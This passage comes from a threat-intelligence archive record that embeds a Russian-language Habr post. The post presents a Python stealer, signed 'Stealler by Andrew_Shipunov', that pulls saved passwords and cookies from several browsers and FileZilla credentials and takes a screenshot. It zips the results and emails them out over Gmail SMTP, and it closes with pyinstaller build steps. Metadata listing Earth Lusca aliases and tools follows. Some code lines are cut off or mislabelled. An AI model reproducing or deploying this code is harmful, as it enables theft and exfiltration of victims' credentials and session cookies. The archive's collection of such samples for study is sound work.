conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textamc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textamc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_cookies.txt', \"w+\")\r\nfile.write(str(Amigo_c()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# OPERA PASSWORDS #\r\n################################################################################\r\ndef Opera():\r\n texto = 'Passwords Opera:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data', os.getenv(\"APPDATA\") +\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_pass.txt', \"w+\")\r\nfile.write(str(Opera()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# FIREFOX PASSWORDS #\r\n################################################################################\r\ndef Firefox_cookies():\r\n texto = 'Passwords firefox:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 15 of 20\n\nif os.path.exists(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2', os.getenv(\"APPDATA\") + '\\\\Ap\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_pass.txt', \"w+\")\r\nfile.write(str(Firefox_cookies()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# YANDEX PASSWORDS #\r\n################################################################################\r\ndef Yandexpass():\r\n textyp = 'Passwords Yandex:' + '\\n'\r\n textyp += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db'\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandexe\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Log\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textyp += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textyp\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\yandex_passwords.txt', \"w+\")\r\nfile.write(str(Yandexpass()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# OPERA cookies #\r\n################################################################################\r\ndef Opera_c():\r\n textoc ='Cookies Opera:' + '\\n'\r\n textoc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCAL\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 16 of 20\n\ncookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textoc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textoc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_cookies.txt', \"w+\")\r\nfile.write(str(Opera_c()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# FILEZILLA #\r\n################################################################################\r\ndef filezilla():\r\n try:\r\n data = ''\r\n if os.path.isfile(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml') is True:\r\n root = etree.parse(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml').getroot()\r\n for i in range(len(root[0])):\r\n host = root[0][i][0].text\r\n port = root[0][i][1].text\r\n user = root[0][i][4].text\r\n password = base64.b64decode(root[0][i][5].text).decode('utf-8')\r\n data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\\n'\r\n return data\r\n else:\r\n return 'Not found'\r\n except Exception:\r\n return 'Error'\r\ntextfz = filezilla()\r\ntextfz += 'Filezilla: ' + '\\n' + filezilla() + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\filezilla.txt', \"w+\")\r\nfile.write(str(filezilla()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# SCREEN #\r\n################################################################################\r\nscreen = ImageGrab.grab()\r\nscreen.save(os.getenv(\"APPDATA\") + '\\\\sreenshot.jpg')\r\n################################################################################\r\n# PACKING TO ZIP #\r\n################################################################################\r\nzname = r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\nNZ = zipfile.ZipFile(zname,'w')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\yandex_passwords.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\alldata.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium_cookies.txt')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 17 of 20\n\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\filezilla.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\sreenshot.jpg')\r\nNZ.close()\r\n################################################################################\r\n# DOC-НАШ ZIP #\r\n################################################################################\r\ndoc = 'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\n################################################################################\r\n# ОТПРАВКА #\r\n################################################################################\r\n'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')\r\nmsgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')\r\nmsg = MIMEMultipart()\r\nmsg['From'] = 'ваша новая почта@gmail.com'\r\nmsg['To'] = 'почта куда отправится'\r\nmsg['Subject'] = getpass.getuser() + '-PC'\r\nmsg.attach(msgtext)\r\n################################################################################\r\n# СОЗДАНИЕ ВЛОЖЕНИЯ #\r\n################################################################################\r\npart = MIMEBase('application', \"zip\")\r\nb = open(doc, \"rb\").read()\r\nbs = encodebytes(b).decode()\r\npart.set_payload(bs)\r\npart.add_header('Content-Transfer-Encoding', 'base64')\r\npart.add_header('Content-Disposition', 'attachment; filename=\"LOG.zip\"')\r\nmsg.attach(part)\r\n################################################################################\r\n# ОТПРАВКА вам #\r\n################################################################################\r\ns = smtplib.SMTP('smtp.gmail.com', 587)\r\ns.starttls()\r\ns.login('новая ваша почта гмаил', 'пароль от новой почты гмаил')\r\ns.sendmail('новая ваша почта гмаил', 'почта куда отправится', msg.as_string())\r\ns.quit()\r\ni = input()\r\nВот что пришло.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 18 of 20\n\nВот что в архиве.\r\nВ тхт Alldata.\r\nСборка.\r\nОткрываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.\r\ncd и путь к файлу.\r\nТеперь pyinstaller --onefile название вашего файла.py, ентер.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 19 of 20\n\nСсылки\r\nm228228 — Пишите мне в вк если что-то не работает, у самого постоянно ошибки лезутXD.\r\n@AndrewJess — или тут спрашивайте.\r\nSource: https://habr.com/en/sandbox/135410/\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://habr.com/en/sandbox/135410/"
	],
	"report_names": [
		"135410"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434329,
	"ts_updated_at": 1775826762,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8fed81b350197ad3e99eff56cda2e1e958498825.pdf",
		"text": "https://archive.orkl.eu/8fed81b350197ad3e99eff56cda2e1e958498825.txt",
		"img": "https://archive.orkl.eu/8fed81b350197ad3e99eff56cda2e1e958498825.jpg"
	}
}